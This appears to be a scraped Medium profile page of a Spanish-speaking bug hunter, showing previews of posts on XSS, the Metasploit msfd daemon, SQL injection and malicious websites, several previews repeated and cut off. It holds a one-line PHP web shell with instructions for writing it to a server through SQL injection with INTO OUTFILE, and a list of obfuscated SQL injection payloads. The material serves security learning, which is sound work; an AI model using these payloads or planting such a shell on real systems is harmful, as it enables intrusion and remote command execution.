
My name is Luis Madero (_Y000!_). I am a computer systems engineer, bug hunter and, above all, a lover of web security. In this write-up I would like to cover XSS injections, from the theory through to some examples of injections throughout history.


msfd — Provides an instance of msfconsole that remote clients can connect to

root@kali:~# msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSL

https://tools.kali.org/exploitation-tools/metasploit-framework

Msfd allows us to connect to a metasploit session no matter what machine we are on, just by having the…


To begin, we first have to talk about the “Msfd” service.

msfd — Provides an instance of msfconsole that remote clients can connect to

root@kali:~# msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSL

https://tools.kali.org/exploitation-tools/metasploit-framework

Msfd allows us to connect to a Metasploit session no matter…


In this case we are going to take advantage of a SQL injection error to be able to “jump” to other vulnerabilities.

For this we need write permissions and need to know the path where the server is mounted; you can find it with @@datadir. In this case I have the path on the error screen.

After having the path, what we are going to do is inject the shell, in this case it is a simple backdoor in php:

'<?php system($_GET["cmd"]); ?>'

We are going to inject it using:

INTO + OUTFILE…


In this case we are going to take advantage of a SQL injection error to be able to “jump” to other vulnerabilities.

After obtaining the path, what we are going to do is inject the shell; in this case it is a simple backdoor in PHP:

'<?php system($_GET["cmd"]); ?>'

We are going to inject it using:

INTO+OUTFILE+'ruta/nombre.php'

Inject it and the file will be written to the server; now we access it.


SQL injections using SQL functions

SQL injection payload using the RPAD function and SOUNDS LIKE

SELECT RPAD(table_name,50,'.') from information_schema.tables where table_schema sounds like database()

SQL injection payload using upper + reverse + right + sounds like to extract information

select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()

SQL injection using elt, double reverse, hex and unhex

Select unhex(hex(reverse(reverse(elt(1, table_Name))))) from information_schema.tables

SQL injection with CASE

SELECT CASE WHEN (1=1) THEN table_name ELSE '<a href=https://twitter.com/_Y000_>_Y00!_</a>' END from information_schema.tables
SELECT CASE 4 WHEN 1 THEN database() WHEN 2 THEN @@version WHEN 3 THEN table_name ELSE '_Y000!_' END FROM information_schema.tables
SELECT CASE WHEN 1>0 THEN table_name ELSE '_Y000!_' END FROM information_schema.tables

SQL IF Function

SELECT IF(STRCMP('1','1'),'_Y000!_',table_name) FROM information_schema.tables
select IF(MID(@@version,1,1)='5',table_name,'_Y000!_') from information_schema.tables

SQL IFNULL

SELECT IFNULL(1+1/0,table_name) FROM information_schema.tables

SQL NULLIF

SELECT NULLIF(table_name,2) from information_schema.tables

SQL injection payload using upper + reverse + right + sounds like

select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()


Nowadays it is crucial to know how to tell a malicious website from an official one; this is increasingly difficult because of the hard work that goes on behind fraudulent sites.

In this writing we are going to analyze some malicious sites that are dedicated to spreading malware for mobile devices and PCs.

What is a malicious website?

A malicious link is a seemingly reliable ‘link’ that, when clicked, redirects to a fake website that imitates a legitimate official website. …


Nowadays it is crucial to know how to tell a malicious website from an official one; this is increasingly difficult because of the hard work that goes on behind fraudulent sites.

In this write-up we are going to analyze some malicious sites that are dedicated to spreading malware for mobile devices and PCs.

What is a malicious website?

A malicious link is a seemingly reliable ‘link’ that, when clicked, redirects to a fake website that imitates a legitimate official website. …


On this occasion I would like to share some tools that can be very useful if you dedicate yourself to the search for vulnerabilities.


On this occasion I would like to share some tools that can be very useful if you dedicate yourself to the search for vulnerabilities.

_Y000_

Hello, welcome to my Medium profile! I'm Y000! 😊 Who am I? 🤔 Well… I'm me, haha, I'm just someone passionate about computer security.
